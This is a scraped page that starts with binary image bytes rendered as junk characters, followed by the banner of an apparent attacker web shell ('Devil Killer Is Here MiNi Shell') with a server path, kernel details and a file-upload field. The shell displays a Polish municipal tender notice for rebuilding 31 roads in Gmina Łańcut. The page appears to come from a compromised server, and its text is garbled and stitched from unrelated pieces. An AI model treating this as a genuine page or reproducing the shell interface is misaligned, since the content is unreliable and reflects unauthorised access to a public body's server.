JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240711/0040828701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> PRZEBUDOWA DRÓG NA TERENIE GMINY ŁAŃCUT </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA ŁAŃCUT</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 690581790</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Adama Mickiewicza 2A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łańcut</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">37-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17 22 22 64</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">17 225 65 36</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowieniapubliczne@gminalancut.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminalancut.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZEBUDOWA DRÓG NA TERENIE GMINY ŁAŃCUT </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2f9a93a2-cad6-4e41-aa71-60cc336a7310</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00408287</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00065676/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 PRZEBUDOWA DRÓG NA TERENIE GMINY ŁAŃCUT</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-2f9a93a2-cad6-4e41-aa71-60cc336a7310 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy E-Zamówienia, która dostępna jest pod adresem: https://ezamowienia.gov.pl/. Zamawiający dopuszcza komunikację za pośrednictwem e-mail: zamowieniapubliczne@gminalancut.pl lub e.balawejder@gminalancut.pl za wyjątkiem składania i wycofania oferty lub wniosku o dopuszczenie do udziału w postępowaniu, prowadzenia negocjacji oraz w szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia,</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie Platformy e-zamówienia i dostępne pod adresem https://ezamowienia.gov.pl/pl/regulamin/ W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub droga elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający obowiązek informacyjny RODO realizuje w dokumentach zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP. 271.19.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest PRZEBUDOWA DRÓG NA TERENIE GMINY ŁAŃCUT<br/>Zamówienie realizowane z Rządowego Funduszu Polski Ład „Program Inwestycji Strategicznych”.<br/><br/>2. ZAKRES PRZEDMIOTU ZAMÓWIENIA SKŁADA SIĘ Z ZAMÓWIENIA PODSTAWOWEGO ORAZ Z ZAMÓWIENIA OBJĘTEGO PRAWEM OPCJI.<br/><br/>3. ZAMÓWIENIE PODSTAWOWE obejmuje przebudowę następujących dróg na terenie gminy Łańcut:<br/><br/>1) Przebudowa drogi na działce nr ewid. 3547/1 w miejscowości Albigowa.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 325,0 m.<br/>2) Przebudowa drogi na działce nr ewid. 86/79 w miejscowości Albigowa.<br/>Zaprojektowano jezdnię szerokości 3,5m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 290,0 m.<br/>3) Przebudowa drogi na działkach nr ewid. 86/51, 86/3 w miejscowości Albigowa.<br/>Zaprojektowano jezdnię szerokości 3,5m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 305,0 m.<br/><br/>4) Przebudowa drogi na działce nr ewid. 2322 w miejscowości Albigowa.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 81,0 m.<br/>5) Przebudowa drogi na działkach nr ewid. 2666, 2639/2, 2577/2, 2638/4, 2004/2 w miejscowości Albigowa.<br/>Zaprojektowano jezdnię z płyt żelbetowych oraz nawierzchni bitumicznej o szer. 2,8-3,0m. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 153,0 m.<br/><br/>6) Przebudowa drogi na działce nr ewid. 487 w miejscowości Cierpisz.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocza z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 112,0 m.<br/>7) Przebudowa drogi na działkach nr ewid. 8, 3/4, 7/4 w miejscowości Cierpisz.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 127,0 m.<br/>8) Przebudowa drogi gminnej publicznej nr 109882R Od przystanku PKP do stacji uzdatniania wody w miejscowości Głuchów.<br/>Zaprojektowano jezdnię szerokości 3,5m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości 0,5 - 0,75 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 535,0 m.<br/>9) Przebudowa drogi gminnej publicznej nr 109885R Od drogi krajowej nr 94 do Granic w miejscowości Głuchów.<br/>Zaprojektowano jezdnię szerokości 3,5m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości 0,5 – 0,75 m na całości przebudowywanego odcinka. Długość przebudowywanej drogi wynosi ok. 595,0 m.<br/>10) Przebudowa drogi gminnej publicznej nr 109873R Głuchów – Zagrody w miejscowości Głuchów.<br/>Zaprojektowano jezdnię szerokości 3,5 - 5,5m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości 0,75 m. Długość przebudowywanej drogi wynosi ok. 990,0 m.<br/>11) Przebudowa drogi gminnej publicznej nr 109874R Głuchów – do przystanku PKP w miejscowości Głuchów.<br/>Zaprojektowano jezdnię szerokości 4,5m o nawierzchni bitumicznej. Ponadto zaprojektowano<br/>pobocze z kruszywa o szerokości do 0,5 – 0,75 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 500,0 m.<br/>12) Przebudowa drogi na działce nr ewid. 358/16 w miejscowości Głuchów.<br/>Zaprojektowano jezdnię szerokości 3,5m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 139,0 m.<br/>13) Przebudowa drogi na działce nr ewid. 358/25 w miejscowości Głuchów.<br/>Zaprojektowano jezdnię szerokości 3,5m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 92,0 m.<br/>14) Przebudowa drogi na działce nr ewid. 362/26 w miejscowości Głuchów.<br/>Zaprojektowano jezdnię szerokości 4,0m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka. Długość przebudowywanej drogi wynosi ok. 223,0 m.<br/>15) Przebudowa drogi na działce nr ewid. 387 w miejscowości Handzlówka.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka. Długość przebudowywanej drogi wynosi ok. 441,0 m.<br/>16) Przebudowa drogi gminnej publicznej nr 109866R Handzlówka – Husów (Reszówka) w miejscowości Handzlówka.<br/>Zaprojektowano jezdnię szerokości 3,5m-4,0m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości 0,50 - 0,75 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 931,0 m.<br/>17) Przebudowa drogi na działce nr ewid. 824, 840 w miejscowości Handzlówka.<br/>Zaprojektowano jezdnię szerokości 3,4m - 4,6m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 634,0 m.<br/>18) Przebudowa drogi na działkach nr ewid. 3375/3, 3374/7, 3374/10, 3373/2 w miejscowości Kosina<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 153,0 m.<br/>19) Przebudowa drogi na działce nr ewid. 1555 w miejscowości Kosina.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 232,0 m.<br/>20) Przebudowa drogi na działkach nr ewid. 831, 826/11, 837 w miejscowości Rogóżno.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka. <br/>Długość przebudowywanej drogi wynosi ok. 150,0 m.<br/>21) Przebudowa drogi na działce nr ewid. 811/2, 837 w miejscowości Rogóżno.<br/>Zaprojektowano jezdnię szerokości 2,8m - 5,5m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 912,0 m.<br/>22) Przebudowa drogi na działkach nr ewid. 1020, 998 w miejscowości Sonina.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 138,0 m.<br/>23) Przebudowa drogi na działkach nr ewid. 1126/8, 1126/13 w miejscowości Sonina.<br/>Zaprojektowano jezdnię szerokości 3,0 – 4,0 m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 200,0 m.<br/>24) Przebudowa dróg na działkach nr ewid. 1117/59, 1117/57, 1116, 1117/21, 1117/32, 1117/13, 1117/34, 1052 w miejscowości Sonina.<br/>Zaprojektowano jezdnię szerokości 3,0-5,0m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 819,0 m.<br/>25) Przebudowa drogi na działce nr ewid. 1295/2 w miejscowości Sonina.<br/>Zaprojektowano jezdnię szerokości 2,80 m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 118,0 m.<br/>26) Przebudowa drogi na działce nr ewid. 731 w miejscowości Wysoka.<br/>Zaprojektowano jezdnię szerokości 2,5-3,2m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 843,0 m.<br/>27) Przebudowa drogi na działkach nr ewid. 763, 773 w miejscowości Wysoka.<br/>Zaprojektowano jezdnię szerokości 2,80 m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 488,0 m.<br/>28) Przebudowa drogi na działce nr ewid. 1924/2 w miejscowości Wysoka.<br/>Zaprojektowano jezdnię szerokości 3,0m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 232,0 m.<br/>29) Przebudowa drogi na działkach nr ewid. 2714/13, 2714/17, 2714/19, 2714/15, 2715/4 w miejscowości Wysoka.<br/>Zaprojektowano jezdnię szerokości 2,80m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 183,0 m.<br/>30) Przebudowa drogi na działkach nr ewid. 3046/2, 3024/10 w miejscowości Wysoka.<br/>Zaprojektowano jezdnię szerokości 2,5m – 3,0m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 212,0 m.<br/>31) Przebudowa drogi na działce nr ewid. 2122, 2124/4, 2124/6, 2125/2 w miejscowości Wysoka.<br/>Zaprojektowano jezdnię szerokości 2,8m o nawierzchni bitumicznej. Ponadto zaprojektowano pobocze z kruszywa o szerokości do 0,5 m na całości przebudowywanego odcinka.<br/>Długość przebudowywanej drogi wynosi ok. 124,0 m.<br/>4. Szczegółowy zakres zamówienia przedstawia dokumentacja techniczna, przedmiary robót </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty ziemne</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający przewiduje zgodnie z art. 441 ust.1 Pzp możliwość skorzystania z prawa opcji tzn. dodatkowych robót. <br/>2. Dodatkowe roboty uzależnione będą wyłącznie od możliwości finansowych Zamawiającego. <br/>3. Dodatkowe roboty nie przekroczą 25% wartości zamówienia podstawowego.<br/>4. Zamawiający może z prawa opcji skorzystać w całości lub w części w terminie 12 miesięcy od daty podpisania umowy.<br/>5. Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego, dlatego też nieskorzystanie przez Zamawiającego z prawa opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego, Wykonawca nie może żądać od Zamawiającego realizacji prawa opcji. <br/>6. Zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia od Zamawiającego, że zamierza z prawa opcji skorzystać, zawierającego opis przedmiotu zamówienia. Strony umowy dopuszczają możliwość przekazania zawiadomienia za pośrednictwem poczty elektronicznej Wykonawcy.<br/>7. Termin wykonania zamówienia objętego prawem opcji nie może być dłuższy niż termin realizacji zamówienia podstawowego.<br/>8. Dodatkowe roboty realizowane będą po cenach jednostkowych określonych w kosztorysie ofertowym złożonym przez Wykonawcę wraz z ofertą. <br/>9. Postanowienia umowy odnoszące się do przedmiotu umowy objętego zamówieniem podstawowym znajdują odpowiednie zastosowanie w odniesieniu do przedmiotu umowy objętego prawem opcji. <br/>10. Sposób postępowania Zamawiającego jest zgodny z wytycznymi zawartymi w Opinii Prawnej Urzędu Zamówień Publicznych pod nazwą -,,Prawo opcji” w ustawie Prawo zamówień publicznych. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 7 dotychczasowemu wykonawcy robót budowlanych stanowiących nie więcej niż 40 % wartości zamówienia podstawowego i polegających na powtórzeniu podobnych robót budowlanych w okresie 3 lat od daty udzielenia zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Na podstawie kryteriów oceny ofert określonych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia na wykonane roboty</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne 